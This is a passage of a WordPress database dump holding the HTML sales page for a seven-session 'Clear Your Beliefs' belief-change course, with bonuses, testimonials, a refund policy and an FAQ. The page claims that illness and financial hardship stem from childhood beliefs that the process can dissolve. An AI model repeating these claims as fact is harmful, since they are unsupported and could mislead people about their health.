will:</strong></p>\n\nDiscover old limiting beliefs that are deeply buried in your subconscious mind\nLearn which ones keep you stuck, preventing you from having what you want in life\nExperience a process that returns you to your True Self, the home of inner joy and bliss\nBegin to work with, not against, your subconscious mind – where your beliefs reside\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 2:   <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n<p><strong> In Session 2, you will:</strong></p>\n\nUse the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself\nClear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again\nSee your own magnificence through a new clear lens of your own beauty and joy\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 3:  <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.</p>\n<p>This isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.</p>\n<p><em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...</p>\n\n<p>Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.</p>\n\nDo you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!\n\n<p><strong> In Session 3, you will:</strong></p>\n\nIdentify old beliefs that stand between you and creating the life you want\nDissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.\nImagine what it means to live without self-imposed limitations, trusting that you can create anything you want\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 4:   <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.</p>\n<p>If you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?</p>\n<p>Humans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.</p>\n\n<p>&nbsp;</p>\n\n<p><strong> In Session 4, you will:</strong></p>\n\nLook deeply into the childhood patterns that enabled you to survive and thrive\nSee which of your beliefs now interfere with your intimate relationships\nDiscover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 5:   <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!</p>\n<p>What do you believe about earning a living in today''s economy?   Is money really the root of all evil?</p>\n<p>If you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?</p>\n\n<p><strong> In Session 5, you will:</strong></p>\n\nExamine your family and cultural beliefs about money, work, poverty and "deservingness."\nRemove beliefs that create stumbling blocks in the way of natural abundance\nCreate new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve\nLearn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 6:   <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.</p>\n<p>Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?</p>\n\n<p><strong> In Session 6, you will:</strong></p>\n\nIdentify old beliefs that stand between you and vibrant health\nRecognize beliefs that make you vulnerable to disease and injury\nDissolve old beliefs at the root of illness, bad habits and lifestyle stress\nImagine the healthy, vibrant body you want, and create it consciously with new beliefs\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<h5>Session 7:   <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.</p>\n<p>You''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.</p>\n<p>When you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.</p>\n\n<p><strong> In Session 7, you will:</strong></p>\n\nScan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live\nLearn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life\nFind your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are\n\n<p></p>\n<p>&nbsp;</p>\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\n<p>In addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.</p>\n<p>&nbsp;</p>\n\nBonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?</p>\n<p>Lion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)</p>\n<p>Carista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.</p>\n<p>Learn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #2 <strong>- The LoveStyle Profile Quiz </strong>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong>\n\n<p><img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.</p>\n\n<p>Lion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.</p>\n\n<p>Anodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong>\n\n<p><strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:</p>\n\nBe called to awaken your already-powerful ability to create the life of your dreams\nLearn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)\nUnderstand the 7 chakras as stepping stones along the path of the manifestation process\nGain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life\nLearn a process that can strengthen your power of intention\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #5:<strong> Change Your Beliefs eBook</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a></p>\n\n<p>You''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" </p>\n<p>Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. </p>\n<p>It''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.</p>\n\n<p><img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\nBonus #6: <strong>Complete Transcripts of the Course</strong>\n\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!</p>\n\n<p>&nbsp;</p>\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.</p>\n<p><em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.</p>\n<p>Your coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.</p>\n<p><strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong></p>\n<h1 id="package"></h1>\n<p style="text-align: right"><a href="http://clearyourbeliefs.com/program/#top">Up To Top</a></p>\n<p>&nbsp;</p>\n\n<h1>Purchase Today and You''ll Receive:</h1>\n<p><strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.</p>\n<h3 style="font-size: 20px">Plus: <em>The Entire BONUS Collection:</em></h3>\n\n<strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n<em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\nYour Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong>\n<strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\nMultimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)\n<strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n<strong>Optional:</strong> Professional Coaching Sessions.\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>About Lion Goodman</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.</p>\n<p>He is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em></p>\n<p>He is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em></p>\n<p>Lion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n\n<p><em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em></p>\n<strong>– G. J., software developer</strong>\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em></p>\n<strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em></p>\n<strong>~ Jamee Tenzer, Life Coaching for Working Women</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em></p>\n<strong>~ S.K., Life Coach, Ontario, Canada </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em></p>\n<strong>~ D. T., Physical Therapist, Denver, CO </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em></p>\n<strong> ~ T. S., Business Owner, Yukon, Canada</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em></p>\n<strong>~ T. L., Healer, Stamford, CT </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em></p>\n<strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em></p>\n<strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I uncovered beliefs I didn''t know I had, including: "I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God." It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em></p>\n<strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em></p>\n<strong>~ C.T., Performance and Life Coach</strong>\n\n<p><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></p>\n\n<p><em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em></p>\n<strong>– M.M., International Business Consultant</strong>\n\n<p>&nbsp;</p>\n\n<p>&nbsp;</p>\n<p><a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank">Register Now</a></p>\n<p style="text-align: center">OR</p>\n<p><a href="http://clearyourbeliefs.com/free-ebook" target="_blank">Free eBook</a></p>\n\n<p>&nbsp;</p>\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n<p>&nbsp;</p>\n<h1>Frequently Asked Questions</h1>\n\n<p><strong>Q: What is a virtual course?</strong></p>\n\n<p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p>\n\n<p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p>\n\n<p><strong>Q: How long will I have access to the course?</strong></p>\n\n<p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p>\n\n<p><strong>Q: Are there scholarships available?</strong></p>\n\n<p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com">info@clearyourbeliefs.com</a>, with a description of your circumstances and your offer of what you can pay.</p>\n\n<p><strong>Q: What is your refund policy?</strong></p>\n\n<p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p>\n\n<p><strong>Q: How can I reach Customer Support?</strong></p>\n\n<p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p>\n\n<p><strong>Q: What is your Privacy Policy?</strong></p>\n\n<p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank">ClearYourBeliefs.com</a>, <a href="http://www.BeliefCloset.com" target="_blank">BeliefCloset.com</a>, or <a href="http://www.ConfusedAboutLove.com" target="_blank">ConfusedAboutLove.com.</a></p>\n\n<p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p>\n\n<p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p>\n\n<p>// </p>', 'Clear Your Beliefs Program', '', 'inherit', 'open', 'open', '', '1941-revision-v1', '', '', '2015-05-21 14:33:09', '2015-05-21 19:33:09', '', 1941, 'http://clearyourbeliefs.com/1941-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(2155, 2, '2015-04-14 12:10:35', '2015-04-14 17:10:35', '<img class="in-top-img" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-Your-Beliefs.jpg">\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<strong>Your "limitations" are created by your beliefs.\nWhen you learn to change your beliefs, limitations disappear,\nand possibilities become unlimited.</strong>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n<p>&nbsp;</p>\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.</p>\n<p>Yet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal 